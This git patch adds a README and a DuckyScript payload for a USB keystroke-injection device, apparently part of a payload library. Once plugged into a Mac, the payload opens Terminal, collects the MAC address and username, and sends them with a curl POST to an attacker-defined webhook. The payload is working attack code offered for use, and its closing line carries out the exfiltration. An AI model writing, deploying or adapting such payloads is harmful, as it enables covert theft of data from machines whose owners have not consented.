From 1ea9c8a689a1e7341f8c628d6c7797cb5ac2fe9e Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 31 Oct 2024 08:23:15 +0100 Subject: [PATCH] Exfiltrate Mac Address - MacOS --- .../Exfiltrate-Mac-Address-MacOS/README.md | 25 +++++++++ .../Exfiltrate-Mac-Address-MacOS/payload.txt | 55 +++++++++++++++++++ 2 files changed, 80 insertions(+) create mode 100644 payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/README.md create mode 100644 payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/payload.txt diff --git a/payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/README.md b/payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/README.md new file mode 100644 index 0000000..b682d87 --- /dev/null +++ b/payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/README.md @@ -0,0 +1,25 @@ +# Exfiltrate Mac Address - MacOS + +This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook. + +### Details + +- **Title**: Exfiltrate Mac Address +- **Author**: bst04 - Aleff +- **Version**: 1.0 +- **Category**: Exfiltration +- **Target**: MacOS + +### Dependencies + +- Set the #WEBHOOK to complete the exfiltration + `DEFINE #WEBHOOK example` + +## How It Works 📜 + +1. Sets a user-defined webhook (`#WEBHOOK`) to complete the exfiltration +2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay... +3. After readiness is confirmed, the script: + - Runs commands to open **Terminal**. + - Acquire the mac address and the system user name + - Send this informations through the Webhook \ No newline at end of file diff --git a/payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/payload.txt b/payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/payload.txt new file mode 100644 index 0000000..d87e712 --- /dev/null +++ b/payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/payload.txt @@ -0,0 +1,55 @@ +REM_BLOCK +#################################################### +# # +# Title : Exfiltrate Mac Address - MacOS # +# Author : bst04 - Aleff # +# Version : 1.0 # +# Category : Exfiltration # +# Target : MacOS # +# # +#################################################### +END_REM + +REM Set the #WEBHOOK to complete the exfiltration +DEFINE #WEBHOOK example + +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION + +REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready +DELAY 200 + +GUI SPACE +DELAY 250 +STRINGLN TERMINAL +DELAY 750 +STRINGLN mac=$(networksetup -getmacaddress en0) +DELAY 750 +STRINGLN name=$(id -un) +DELAY 850 +STRINGLN curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" #WEBHOOK